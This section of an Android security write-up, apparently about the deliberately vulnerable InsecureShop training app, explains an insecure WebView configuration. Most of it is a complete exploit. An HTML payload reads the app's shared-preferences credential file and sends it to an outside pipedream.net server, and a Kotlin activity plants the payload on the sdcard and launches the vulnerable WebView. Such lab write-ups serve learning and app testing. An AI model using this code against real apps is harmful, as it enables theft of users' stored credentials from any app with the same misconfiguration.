😂Vulnerability #12: Insecure Webview Properties Enabled

The WebView class is an extension of Android’s View class that allows you to display web pages as a part of your activity layout. Take note that webviews are not fully fleged browsers, but only shows a web page in the activity. In our target application, we have three activities that utilize webviews:

• com.insecureshop.WebViewActivity

• com.insecureshop.WebView2Activity

• com.insecureshop.PrivateActivity

Webviews are widely used in most android apps, but misconfigurations in these components can lead to dangerous vulnerabilities. Let’s try to analyze some of the webview settings in com.insecureshop.WebView2Activity

This configuration is dangerous, since combining javaScriptEnabled = true + allowUniversalAccessFromFileURLs = true with the ability to load any arbitrary url can lead to the theft of arbitrary files:

pwned.html

<html>
    <head>
    </head>
    <body>
        <script type="text/javascript">
            function exfiltrateFile(path, callback) {
              var req = new XMLHttpRequest();

              req.open("GET", "file://" + path, true);
              //req.overrideMimeType("text/xml");
              req.onload = function(e) {
                /* some debug stuff, as an attacker you would want to perform this silently
                document.write("did we receive the file?");
                document.write(req.responseText);
                */
                callback(btoa(req.responseText));
              }
              req.onerror = function(e) {
                document.write("error again fuck");
                callback(null);
              }
              req.send();
            }

            // file we need to exfiltrate, contains app credentials
            var file = "/data/user/0/com.insecureshop/shared_prefs/Prefs.xml";

            exfiltrateFile(file, function(contents) {
                document.write("we reach exfiltrateFile right?");
                var exfil = new XMLHttpRequest();

                // place attacker server here
                exfil.open("GET", "https://encn0rhq3ml1a.x.pipedream.net?file=" + contents, true);
                exfil.onload = function(e) {
                    document.write("</br>[+] File successfully exfiltrated to remote server");
                }
                exfil.onerror = function(e) {
                    document.write("error again fuck");
                    callback(null);
                }
                exfil.send();
            });
        </script>
    </body>
</html>

The file above is the html code that will retrieve the contents of the vulnerable application’s share preferences which contains user credentials and exfiltrates it to a remote server. Our code below will write the file into the device’s sdcard directory then start up the vulnerable webview to load the payload file.

MainActivity.kt

class MainActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)

        // write pwned.html to a publicly accessible directory (e.g, /sdcard)
        var readfile = BufferedReader(InputStreamReader(assets.open("pwned.html"))).readText()
        var payload = File(Environment.getExternalStorageDirectory().absolutePath, "pwned.html")
        payload.writeText(readfile)

        // start the vulnerable webview
        var exploitIntent = Intent()
        exploitIntent.setClassName("com.insecureshop", "com.insecureshop.WebView2Activity")
        exploitIntent.action = "com.insecureshop.android.WEBVIEW"
        exploitIntent.addCategory("android.intent.category.BROWSABLE")
        exploitIntent.putExtra("url", "file:///sdcard/pwned.html")
        startActivity(exploitIntent)
        
    }
}

The same exploit can be used for the other vulnerabilities in activities where webviews are used.